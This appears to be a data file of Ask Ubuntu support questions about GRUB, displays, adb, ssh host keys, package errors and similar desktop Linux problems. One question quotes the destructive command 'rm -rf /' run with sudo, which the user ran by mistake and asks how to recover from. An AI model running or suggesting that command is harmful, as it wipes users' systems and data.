213859	apple cinema display 23 '' and grub	as per the title , i 'm running my display on an older 23 '' apple cinema display ( because i still love it , darn it ) . i 'm pushing it with an ati radeon dvi dual-link pcie card . it works just fine , except grub does n't seem able to push out the 1920x1200 pixel resolution needed in order to show me a boot menu ! so ... , i keep a smaller second monitor connected as the primary display so that i can see the boot menu and boot the system ( i do n't use that display once booted ) . this is a goofy work-around , and i 'd like to just use my single display exclusively to boot the machine . i found some grub codes for higher resolutions , but not for 1920x1200 . is it capable of this ? did i just miss it ? thanks in advance ! ! !
213861	is there a way to recover a file that i have deleted but is still open somewhere ?	this question is related to how to recover deleted files ? but it is slightly different in nature . suppose i have a file named ~/something open in a text editor . further suppose that i open a terminal and run the following command while the file is still open in the text editor : rm ~/something this will delete the file . now suppose that i changed my mind and wanted to get the file back . the file is still open in the text editor , so it has n't been removed from the disk or filesystem yet . is there any way to recover it ?
213864	'installing breakpad exception handler for appid ( steam ) ' while trying to run steam	i installed steam for ubuntu , so i tried to launch it and i get this : ~ $ steam installing breakpad exception handler for appid ( steam ) /version ( 1352224866_client ) ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler xt [ amd radeon hd 6700m series ] ( rev ff ) what is the problem and how to fix it ?
213870	hibernation failed due to insufficient swap partition	i got 8gb ram on my laptop but only partitioned 1gb for swap , now the hibernation can not be achieved even if i use sudo pm-hibernate . is there any solution ?
213871	grub rescue prevents live cd/usb or boot menu	tl ; dr : grub rescue comes up and wo n't let me even load bios , boot menu , or fire up live cd/usb . laptop is eufi capable , with windows 8 on one partition . i have a lenovo ideapad which just came in packaged with windows 8 . i repartitioned the hard drive , turned off eufi and fired up ubuntu live dvd . then i installed ubuntu . however , i quickly decided that it was a mistake and decided to reinstall ubuntu server edition . i opened up windows , deleted partition , prepared everything , and then rebooted . now , however , grub rescue comes up . this is fine because i 've had to deal with this pesky little booger other times , but every time i simply fixed it by loading up a live cd and just doing update-grub and a few other things , and voila . however , this time ... well , it just wo n't let me . before installing ubuntu for the first time , i simply pressed f2 ( or esc , i 'm not sure ) to load up the bios and changed settings there ( turned off uefi and stuff ) . then , restarted and pressed f12 ( or f8 , again not sure ) to load up boot menu to choose ubuntu live cd . it all worked splendidly the first time . this time though grub rescue comes up and it is n't even allowing me to enter bios , boot loader or anything . as soon as i fire up the machine , the `` lenovo '' sign comes up and i desperately press any key i can , but it goes straight up to grub rescue . this is especially terrifying because now i ca n't go back to the bios to switch eufi back on and load my windows hard drive . maybe this may be useful , but `` ls '' on grub rescue outputs : ( hd0 ) ( hd0 , gpt7 ) ( hd0 , gpt6 ) ( hd0 , gpt5 ) ( hd0 , gpt4 ) ( hd0 , gpt3 ) ( hd0 , gpt2 ) ( hd0 , gpt1 ) ( hd1 ) i have my ubuntu server ed . usb ready and ubuntu desktop ed . dvd fired up . but as i said they are both also helpless against the monster that is grub rescue . help is much appreciated .
213872	audio real time monitoring	i have intel on board sound . i have been trying to listen on headphones to input sound from microphone , rakarrack etc . the sound from the microphone will show as an input level in the sound settings window but i ca n't hear it in the headphones . similarly with rakarrack , the sound meters show sound produced , but i can not hear it on the headphones . the pulse audio volume control only shows system sounds for a playback option , but an alsa plug in for the browser pops up when i play youtube for example . can you help please ? i have qjackctl installed but ca n't make any sense out of it because i ca n't get any sound out .
213873	what library i need to install if i want to compile emacs	i am trying to compile emacs on ubuntu 12.04 . this is because i want to use emacs 24.2 . but i am getting this error . how can i fix it ? checking for long file names ... yes checking for x ... no checking for x ... true configure : error : you seem to be running x , but no x development libraries were found . you should install the relevant development files for x and for the toolkit you want , such as gtk+ , lesstif or motif . also make sure you have development files for image handling , i.e . tiff , gif , jpeg , png and xpm . if you are sure you want emacs compiled without x window support , pass -- without-x to configure .
213874	how to configure adb access for android devices ?	i 'm using ubuntu 12.10 and i have installed android sdk , set it 's path in my user .bashrc and it works . the problem is that my phone requires adb to be ran by root for permissions , but running adb with sudo i get the following error : sudo : adb : command not found i tried to simply use sudo -e adb start-server , but it does n't work . tried to add the export path line to /root/.bashrc and ( after realizing it did n't help ) to /etc/bash.bashrc . i remember i could set it on my arch linux , but i guess my problem now is connected to ubuntu root account not behaving like i expect it . what i do n't understand is the following : these do n't work : martin @ alyx : ~ $ sudo adb devices sudo : adb : command not found this does ( typing the full path ) : martin @ alyx : ~ $ sudo /opt/android-sdk-linux/platform-tools/adb devices * daemon not running . starting it now on port 5037 * * daemon started successfully * list of devices attached cm7-blade device this does n't work ( using -e with sudo ) : martin @ alyx : ~ $ sudo -e adb devices sudo : adb : command not found this works ( as root ) : martin @ alyx : ~ $ sudo su root @ alyx : /home/martin # adb devices list of devices attached cm7-blade device i 'm totally confused now and i 'd appreciate some clarifying on how to set a path for sudo or how else i could solve my problem . ( and please , do n't say adb should n't be ran as root . ) thanks in advance ! edit : by requiring root permissions i mean that i need them because otherwise $ adb devices gives me ? ? ? ? ? ? ? ? ? ? ? ? no permissions which does n't occur as superuser . sorry if it was misunderstanding .
213875	multiple accounts in gnome shell	i 'm wanting to sync many accounts with gnome shell such as gmail , hotmail , google+ , twitter , tumblr , facebook etc . i know how to add accounts via the settings menu , however the only options i have are windows live and google accounts . is there a way to edit this so i can have notifiers in the status bar etc ? really stuck on this one ! thanks : )
213878	how to change default boot disk and skip the grub screen ?	i probably did something really stupid . my primary hard drive on my laptop was getting full so i decided to install ubuntu 12.10 on an external hard drive . when i have the hard drive plugged in , i am first presented with the grub screen where i have to option to boot in ubuntu or windows . everything works fine with the external drive plugged in but when i try to boot without it , i get a grub rescue screen and ca n't do anything . i believe my problem is that the computer first looks for the grub menu and ca n't find it . it then freezes up and is unusable . is there any way to get past this problem so i do n't have to carry my external drive around all the time ?
213879	how to save images on rekonq ?	all . i issued the command : apt-get install kubuntu-desktop and then i started using rekonq for kubuntu 12.04 . i right-click in an image and click save image . nothing happens.. or does it happen ? i do n't see the images i want to be saved in my ~/images folder . am i doing something wrong ?
213883	software center problem	i am using ubuntu 12.10 . my problem is : when i download any package in software center it works well , but when it is going to install it takes so much time , sometimes my pc is hang . then restart is the only solution . thanks advance for your help .
213884	tcp advertised window in ubuntu 11.10	i want to increase tcp advertised window beyond 10 packets . i have tried tweaking most of the relevant parameters in /proc/sys/net/ like /proc/sys/net/core/rmem_max , /proc/sys/net/ipv4/tcp_rmem i wanted to test the paper by google `` increasing the initial congestion window '' . i am able to test it till the congestion window on the server side is increased till 10 . but after that it keeps waiting for an ack from the client ( my ubuntu box ) because the advertised window is close to 10 packets . all other settings are default as in ubuntu 11.10 ( tcp cubic reno ) am i doing something wrong . please suggest .
213885	map default microsoft office keys in keyboard to run libreoffice suite	i have ngs trail-blazing keyboard and almost all my extra keys ( multimedia , web , calculator , turn off , block screen , etc ) work or i can map it in the system settings . this keyboard also has 4 extra keys that in windows serves the purpose of running microsoft word , powerpoint , excel and outlook . i want to map those keys to open libre office writer , impress , calc and base . the problem is that xev and ketouch do not recognize those 4 keys . how can i make it work ? : ( thank you in advance
213889	microsd card is set to read-only state . how can i write data on it ?	i have a microsd card reader in my notebook . when i insert a microsd memory card into it , i ca n't write any data on it - it 's read-only . the same thing happens when i try to do it under root . and i ca n't change the permission policy for it . this problem happens for all microsd cards ( i 've tested 2 cards ) . i 've encountered it on ubuntu 12.04 lts , now i 'm on ubuntu 12.10 , the problem is still on it 's place . when i try to insert such a `` read-only '' card in my mobile phone , everything 's ok and i can write data on it . so , can anybody tell me , how can i write a data onto the card ? upd : here 's fdisk -l output : disk /dev/sdc1 : 2013 mb , 2013135360 bytes 62 heads , 62 sectors/track , 1022 cylinders , total 3931905 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system the file system of the card is `` msdos '' ... as to me it 's weird ... upd2 : i 've found a small `` lock '' switch on my card adapter , and it turns out , that when i insert it in my notebook , it switches on . perhaps , i have to find some glue or something to get that switch stuck ... upd3 : there was no glue near me , so i 've decided to buy another card-reader .
213891	messenger program that supports msn protocol and supports unity bar ?	i 'm presently using pidgin , but it does n't adequately notify me when i receive a message . i know i can get it to make noise , and pop up a notification , but i very specifically would like the icon to flash or wiggle ( or something ) on the sidebar until i check it . is there a way i can get pidgin to do this/and or is there a different program that does ? it needs to support msn . ( edit : can someone create the `` messenger '' tag please ? )
213893	does ubuntu only work on desktop pcs ?	on the download page for ubuntu it says `` download ubuntu for your desktop '' . is ubuntu 12.10 only compatible with desktops ? or does it work with notebooks as well ?
213896	nvidia-settings recognizes monitors resolution but refuses to allow me to choose it	i have an nvidia gtx 570 card in my machine , with two monitors connected . this very , very nearly works . i am running kubuntu 12.10 . upon installation , both monitors worked great , i only had to swap their order ( my primary is on the right , it assumed left ) and i was able to do so with the ubuntu display manager app . then i enabled the nvidia drivers . they worked right off the bat ! except , they also presumed the wrong physical order of my displays . so , i went into the nvidia settings app to change that . things went downhill fast . now , even with the nvidia drivers after reboot , both monitors were working correctly in every way except for their order . and in the nvidia settings app , under the gpu 0 item it recognizes both monitors , and it recognizes their proper native resolution ( 1920x1200 for one , 1680x1050 for the other ) . however , when i go to the x server display configuration item , it displays both monitors with a resolution of 1024x768 embedded within their proper size . i can only select 1024x768 as the max resolution of either monitor here . i can drag their boxes around and set them up properly physically , but if i apply these settings , even with auto selected for their resolutions , it changes both monitors to 1024x768 . my best guess as to why this is is because the 1920x1200 monitor runs at 75hz while the 1680x1050 monitor runs at 60hz , though it can do 75hz at lower resolutions . i can only guess that 1024x768 is the highest resolution that allows them both to run at the same refresh rate ( though the 1920x1200 can easily run at 60hz as well , and it appears to be doing so right now ) . i have been trying to research this problem , but i have n't found anyone with this problem where the nvidia settings app clearly recognizes both monitors perfectly well , it simply refuses to allow setting the resolutions it is already running the monitors at . i am willing to craft a custom xorg.conf if i have to , but i find some instructions recommending turning on xinerama , others advocating twinview , and none adequately explaining the purpose of various lines ( for instance i do not know if i should use a 'metamode ' or how to create one if necessary ) . any help would be greatly appreciated . i just want the nvidia driver to do what it is doing right now ( though bumping my larger monitor to its native 75hz would n't be bad ) except let me move the mouse from one screen to the other without having to wrap around the opposite way of how the monitors are laid out !
213906	custom plymouth splash is n't showing up	i 'm having trouble with my custom plymouth theme . i 'm using ubuntu 12.10 and the x11 plymouth plugin ( so i do n't have to restart the computer ) . but when i run the plugin all i get is a black screen , my splash image does n't show up . my .plymouth file : [ plymouth theme ] name=cornflower description=cornflower plymouth theme modulename=script [ script ] imagedir=/lib/plymouth/themes/cornflower scriptfile=/lib/plymouth/themes/cornflower/cornflower.script my .script file : flower_image = image ( untitled.png ) ; flower_sprite = sprite ( flower_image ) ; flower_sprite.setx ( window.getwidth ( ) /2 - flower_image.getwidth ( ) /2 ) ; flower_sprite.sety ( window.getheight ( ) /2 - flower_image.getheight ( ) /2 ) ; progress = 0 ; fun refresh_callback ( ) { progress++ ; flower_sprite.rotate ( progress ) ; } if any more information is needed i will provide it . edit : and for the record , i did try the framebuffer=y technique but it did n't work .
213909	running kile from terminal	i installed kile from offline installer and everytime i want to run it , i need to go to the install directory and then run it cd /home/usrname/kile-install ./kile is there anyway to add a command so that this process is automated ? i.e i want to type `` kile '' in the terminal and it should open kile . edit : tried modifying .bashrc file added the following lines to .bashrc path=path $ : /home/usrname/kile-install/bin path=path $ : /home/usrname/r2009b/bin the second one works but kile does not work . thanks .
213913	i get a command prompt instead of login screen when i boot ubuntu	is that normal ? i am currently ( trying to ) use 12.10 .
213915	ca n't install any applications	every application install attmept end in failure with this showing in the details : installarchives ( ) failed : dpkg : error : parsing file '/var/lib/dpkg/available ' near line 0 : newline in field name `ipts' existing apps work
213917	ca n't ssh with ip alias	this is may sound like a weird prob . i am able to seamlessly ssh to remote hosts and also to `` localhost '' . as part of requirement , i have modified the /etc/hosts file with below entries : 127.0.0.1 localhost # we all know this 10.45.65.1 master # static ip address of my local machine with alias `` master '' i can do this : ssh localhost but when i try : ssh -v master , i get below error - openssh_5.3p1 debian-3ubuntu7 , openssl 0.9.8k 25 mar 2009 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to master [ 10.42.43.1 ] port 22. debug1 : connection established . debug1 : identity file /home/hduser/.ssh/identity type -1 debug1 : identity file /home/hduser/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/hduser/.ssh/id_dsa type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.3p1 debian-3ubuntu7 debug1 : match : openssh_5.3p1 debian-3ubuntu7 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.3p1 debian-3ubuntu7 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ warning : possible dns spoofing detected ! @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ the rsa host key for master has changed , and the key for the corresponding ip address 10.42.43.1 is unchanged . this could either mean that dns spoofing is happening or the ip address for the host and its host key have changed at the same time . offending key for ip in /home/hduser/.ssh/known_hosts:14 @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ warning : remote host identification has changed ! @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ it is possible that someone is doing something nasty ! someone could be eavesdropping on you right now ( man-in-the-middle attack ) ! it is also possible that the rsa host key has just been changed . the fingerprint for the rsa key sent by the remote host is d0 : ff : f0:68:2d:6c:95:7b:89:71 : df:99:6b:48:15 : a2 . please contact your system administrator . add correct host key in /home/hduser/.ssh/known_hosts to get rid of this message . offending key in /home/hduser/.ssh/known_hosts:2 rsa host key for master has changed and you have requested strict checking . host key verification failed . any suggestions ?
213925	how do i get the name of a package , modify and install it ?	i 'm not very familiar with ubuntu or linux , but i 'm a programmer , and some people told me that you can just go ahead and modify your system . so my question is , how do you go on about that ? for instance , if i 'm interested in modifying the behavior of the button or the desktop icons , or whatever it is : how do i get the source code ? i guess i need the package name and download it . but how can i get the package name ? let 's say i want the button package , where do i look to get the package name ? is there a list on a website or a help file ? once i modify it , how can i replace the original with the new one ? p.s . i had some troubles finding the right tags , feel free to edit them
213928	create archive on ftp in ubuntu 12.10	trying create archive in ubuntu 12.10 on ftp thought nautilus right click compress i got this message : could not create the archive . you do n't have permission to create an archive in this folder . in ubuntu 12.04 it 's ok .
213931	downloading big file from ftp in nautilus in ubuntu 12.10	after several seconds after download starting i have message `` error while copying file.zip . there was an error copying the file into /home/user . timeout was reached '' . in ubuntu 12.04 it 's ok .
213934	any success installing rational team concert on ubuntu 12.04	supposedly rational team concert is only supported for 10.04 ubuntu . i suspect that with some tweaks , it could work on 12.04 . please respond if you 've been able to install rtc 4.0 on 12.04 ubuntu .
213936	how do you dual boot windows 7/8 seperatly with grub ?	i installed the beta version of windows 8 and re-installed grub . when i boot my computer and select windows 7 , i get the new windows 8 booting screen asking to boot between either windows 7 or 8 . if i choose windows 7 , my computer then restarts and i have to select windows 7 again in order to boot into 7 . but if i choose windows 8 it boots right up . i understand i can choose which os to boot by default , but i want my grub options to be the only way to choose between os 's . so my question is , how can i set this up so that when i click on windows 7 , i go there , and when i select windows 8 , i boot 8 ?
213940	how can i set my screen resolution to match my tv ?	i have a computer in my classroom that 's connected to an lg smart tv ( that 's actually not so smart . i would n't recommend buying one. ) . for the touch interface , the tv wants a resolution of 1920x1080 at 60hz . however , i ca n't seem to set the computer to that resolution . the display settings only offer 1024x768 and 640x480 . the computer dual boots with windows xp , where widescreen options are available in approximately the required size , but the exact resolution -- or even aspect ratio -- is n't available in xp either . i tried the following command : xrandr -s 1920x1080 -r 60 the response was : size 1920x1080 not found in available modes back in the old days , the solution would be to edit xorg.conf . however , since that file no longer exists , and i have n't found up-to-date info , i do n't know what else to do . if it helps , this machine will never be connected to a different display , so resolution flexibility is n't important . here 's the output of lshw : *-display:0 description : vga compatible controller product : 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : fe800000-febfffff memory : d0000000-dfffffff ioport : ecd8 ( size=8 ) *-display:1 unclaimed description : display controller product : 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 03 width : 64 bits clock : 33mhz according to the system settings , my graphics driver is unknown and my `` experience '' is standard . this is 64-bit ubuntu 12.04 ( precise ) note : there are a number of similar questions to this one , but they did n't include any answers that helped me . update after posting this question , i noticed one in the sidebar that i had n't found through search but which appeared to contain the answer . based on that question , i created the /etc/x11/xorg.conf file below : section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' load `` dri2 '' load `` dbe '' load `` dri '' load `` record '' load `` extmod '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` lg '' modelname `` smart tv '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` dri '' # [ < bool > ] # option `` colorkey '' # < i > # option `` videokey '' # < i > # option `` fallbackdebug '' # [ < bool > ] # option `` tiling '' # [ < bool > ] # option `` linearframebuffer '' # [ < bool > ] # option `` shadow '' # [ < bool > ] # option `` swapbufferswait '' # [ < bool > ] # option `` triplebuffer '' # [ < bool > ] # option `` xvmc '' # [ < bool > ] # option `` xvpreferoverlay '' # [ < bool > ] # option `` debugflushbatches '' # [ < bool > ] # option `` debugflushcaches '' # [ < bool > ] # option `` debugwait '' # [ < bool > ] # option `` hotplug '' # [ < bool > ] # option `` relaxedfencing '' # [ < bool > ] identifier `` card0 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' defaultdepth 24 # subsection `` display '' # viewport 0 0 # depth 1 # endsubsection # subsection `` display '' # viewport 0 0 # depth 4 # endsubsection # subsection `` display '' # viewport 0 0 # depth 8 # endsubsection # subsection `` display '' # viewport 0 0 # depth 15 # endsubsection # subsection `` display '' # viewport 0 0 # depth 16 # endsubsection subsection `` display '' viewport 0 0 depth 24 modes `` 1024x768 '' `` 1920x1080 '' endsubsection endsection according to /var/log/xorg.0.log , my settings are n't being applied . in fact , i wonder if the config file is even being read . [ 1209.083 ] ( ** ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 1209.084 ] ( == ) intel ( 0 ) : rgb weight 888 [ 1209.084 ] ( == ) intel ( 0 ) : default visual is truecolor [ 1209.084 ] ( ii ) intel ( 0 ) : integrated graphics chipset : intel ( r ) g41 [ 1209.084 ] ( -- ) intel ( 0 ) : chipset : `` g41 '' [ 1209.084 ] ( ** ) intel ( 0 ) : relaxed fencing enabled [ 1209.084 ] ( ** ) intel ( 0 ) : wait on swapbuffers ? enabled [ 1209.084 ] ( ** ) intel ( 0 ) : triple buffering ? enabled [ 1209.084 ] ( ** ) intel ( 0 ) : framebuffer tiled [ 1209.084 ] ( ** ) intel ( 0 ) : pixmaps tiled [ 1209.084 ] ( ** ) intel ( 0 ) : 3d buffers tiled [ 1209.084 ] ( ** ) intel ( 0 ) : swapbuffers wait enabled [ 1209.084 ] ( == ) intel ( 0 ) : video overlay key set to 0x101fe [ 1209.172 ] ( ii ) intel ( 0 ) : output vga1 using monitor section monitor0 [ 1209.260 ] ( ii ) intel ( 0 ) : edid for output vga1 [ 1209.260 ] ( ii ) intel ( 0 ) : printing probed modes for output vga1 [ 1209.260 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz ) [ 1209.260 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz ) [ 1209.260 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz ) [ 1209.260 ] ( ii ) intel ( 0 ) : modeline `` 848x480 '' x60.0 33.75 848 864 976 1088 480 486 494 517 +hsync +vsync ( 31.0 khz ) [ 1209.260 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x59.9 25.18 640 656 752 800 480 489 492 525 -hsync -vsync ( 31.5 khz ) [ 1209.260 ] ( ii ) intel ( 0 ) : output vga1 connected [ 1209.260 ] ( ii ) intel ( 0 ) : using user preference for initial modes [ 1209.260 ] ( ii ) intel ( 0 ) : output vga1 using initial mode 1024x768 [ 1209.260 ] ( ii ) intel ( 0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 1209.260 ] ( ii ) intel ( 0 ) : kernel page flipping support detected , enabling [ 1209.260 ] ( == ) intel ( 0 ) : dpi set to ( 96 , 96 )
213943	how to remove encryption password	recently i installed ubuntu 12.10 on my system and by mistake put up an encryption password , the password that is required to load ubuntu . although i know that password , but i need to remove that . please help me
213948	get `` failed to read '' message when i try to restore my computer from usb backup	i recently backed up my computer ( v12.04 ) with a usb drive . when i tried to restore my files from the usb drive i got this message . failed to read /tmp/duplicity-idfsck-tempdir/mktemp-wtwqjl-33 : ( , error ( 'error -3 while decompressing : invalid code lengths set ' , ) , ) the backup seams to be fully intack . is there another way to recover the files from the backup ?
213949	can not boot ubuntu after removing packages ?	i have problem now with booting into ubuntu because i removed some packages from package manager and its dependencies by mistake . after i saw desktop removing applications one by one and the theme starting to disappear . after i tried to restart the login , i tried to fix it using recovery mode but it 's not working . i am sure there are important packages removed , the problem is that i have no backup for my files .. also , i need my firefox stored passwords . i tried to boot to ubuntu live cd but files encrypted in home folder and no access to it . is there away to access it ? further information : i think can boot , and have boot menu , after choosing boot normal or recovery .. i have some output but do n't reach the desktop . i do n't think there is problem with grub boot because i have the boot menu , i think the problem is that important system packages have been removed .. and that maybe the reason that recovery mode did n't do anything , fix dkge did n't help and any other option in the recovery menu . i think the solution may require the re-installation of ubuntu , but i am afraid of losing important data like files and firefox passwords .. etc . i remember on windows when i was fixing the os i would repair and files application still existed , is that the same on ubuntu ? can i use ubuntu 12.10 cd and start install it on the same partition and finally i 'll find my application and files ?
213950	how to recover from 'sudo rm -rf ' command ?	by mistake , i ended up executing rm -rf / command from sudo on my laptop which erased many files before it stopped . now when i restarted my system , it drops to this prompt : grub rescue > _ i am having dual-boot with ubuntu 12.04 and windows 7 . i request help for the following questions : how do i fix the currently installed ubuntu without overwriting/erasing the left over files ( from rm -rf command ) ? is using boot-repair safe ? is there a way to directly go to windows 7 ?
213951	downloaded images failed checksum validation for ubuntu for nexus7	hi i tried to follow the steps in https : //wiki.ubuntu.com/nexus7/installation but i 'm stock on the step 4 , because when i { m loading the latest image i got this error downloaded images failed checksum validation
213956	how disable one core from dual core machine	i have a toshiba satellite l300 dual core laptop . due to some problem i need to disable one core . how to do this in ubuntu 12.10 ?
213958	can i add myself to group `root ' ?	$ id uid=1000 ( kev ) gid=1000 ( kev ) groups=1000 ( kev ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,109 ( lpadmin ) ,124 ( sambashare ) $ ls -l /etc/sudoers -r -- r -- -- - 1 root root 723 jan 31 2012 /etc/sudoers $ sudo adduser kev root adding user `kev ' to group `root ' ... adding user kev to group root done . $ cat /etc/sudoers cat : /etc/sudoers : permission denied after adding myself ( kev ) to group root , i still can not read /etc/sudoers . i do n't know why . thanks for your help .
213971	ubuntu upgrade issue - iso files	earlier iso files downloaded from the ubuntu websites contained an upgrade script . thus the iso image could be mounted and the upgrade command issued . current iso images seem to miss that command altogether . while some people suggest burning the iso files to a cdrom , i find the practice non-environment friendly . would it be possible to restore the upgrade script ?
213976	cant see the `` format '' option in quicklist for a usb device in 12.10.how can i get it back ?	i am not able to find the format option in the quicklist menu for an external usb drive after i installed 12.10 how can i et it back ? i tried the quicklist editor in ubuntu tweak but it does not allow adding any entry to a device quicklist ! what can i do ?
213979	i can not login to my ubuntu admin ! ! ! ! help !	i used lightdm to hide the users at the login prompt of ubuntu and it hid my account . the only one visible is `` other '' and it does n't even have a known password . so , i have accessed the terminal and created a guest account and another account without passwords and they are not visible . i am new to using the terminal so i do n't know how to write the commands for either : making all users/accounts visible to the login and/or making the guest accounts visible , and then once in the gui change the login settings to see my admin account . i have no idea of what else i could do , or even how to do it . i would appreciate any help , i 'm in a desperate situation because i really need to access my desktop ! thank you ! ! ! any ideas are appreciated ! ! !
213981	failed to get the adb version : can not run program & can not allocate memory	a little change in resources file , start giving error , and when i clean the project its delete r.java file and i have to restart my eclipse . problem is when i restart my eclipse and clean and run my project its give below error : failed to get the adb version : can not run program `` /home/android-sdk-linux/platform-tools/adb '' : java.io.ioexception : error=12 , can not allocate memory from '/home/android-sdk-linux/platform-tools/adb ' - exists=true i restart the system too but same problem . also run chmod -r 777 but no luck . checked this but no help : http : //stackoverflow.com/questions/8343729/failed-to-get-adb-version-error-13-in-ubuntu-11-10
213987	i ca n't display any linux right anymore after starting to use a new video card on my pc -hd 6570-	i 'm running windows 8 right now . everything looks and works quite fine and my new video card runs the games nicely . i was able to install ubuntu before i started using my new video card i decided to install ubuntu but ubuntu , fedora..mint all of them look weird on the screen . i think i can describe what i can see as..dead coloured background and over it there are red dots that make stripe patterns..but there are no dots on texts.. like this : http : //imageshack.us/photo/my-images/833/23963038.png/ it happens even if i try booting with safe graphics mode . notice that there are no dots on `` ubuntu '' text . i 'm able to install ubuntu with a screen like that by choosing `` install ubuntu '' .. but ubuntu wo n't really work at all after installing sometimes it shows the error that starts with `` panic occured ... '' and does n't even shutdown..i 'm not able to write commands like reboot then . is there any way to fix this ? amd hd 6570 video card , asus m5a78l-m lx motherboard , amd phenom ii x4 cpu note : there are no problems with running linux via virtualbox .
213989	sound not working after suspend on lenovo t400	i am using ubuntu 12.10 on lenovo t400 . suddenly sound stopped working . it used to work perfectly fine before . i guess , after i suspended my computer ( not sure if its first time suspending my computer : p ) sound stopped working . i rebooted my system but still of no luck . but headphones are working fine . i tried playing with various sound settings . none of them worked . please help . thanks
213991	run ubuntu 11.04 after full installation	i have did a full installation of ubuntu 11.04 on a 8gb flash drive and i want to run it as a guest os on a windows 7 host computer . can anyone provide a guide on how i can run it ? thanks !
213995	where can i find the original ubuntu logo files of various versions ?	i saw somewhere logo files just like the png file in /lib/plymouth/themes/ubuntu-logo/ubuntu-logo.pn but much bigger . where can i download them ?
213998	dvd wo n't autoplay	i 'm using ubuntu 12.10 i accidentally unlocked the dvd icon from the launcher , and now i ca n't get the icon back . also , dvds wo n't auto-play any more . yes , i tried googling for solutions , but could n't find anything .
214000	does linux filesystem support fast file searching /indexing ?	i wonder why are n't there any tool that enable one to find files on his harddisk very rapidly like `` search everything '' does .just type a part of the file name and all files containing the keyword will show up instantly . is n't it possible to design a program to record the names of all files in some directory in a database so that you can search the database quickly for file names ?
214008	failed to use upstart to control startup dependency	in a server i have memcached and apache2 installed , i want my apache2 only can start if memcached is started , so in my apache upstart script , i added the line from start on runlevel [ 2345 ] to start on runlevel [ 2345 ] and memcached i found my apache2 can not be started then , any hints to debug ?
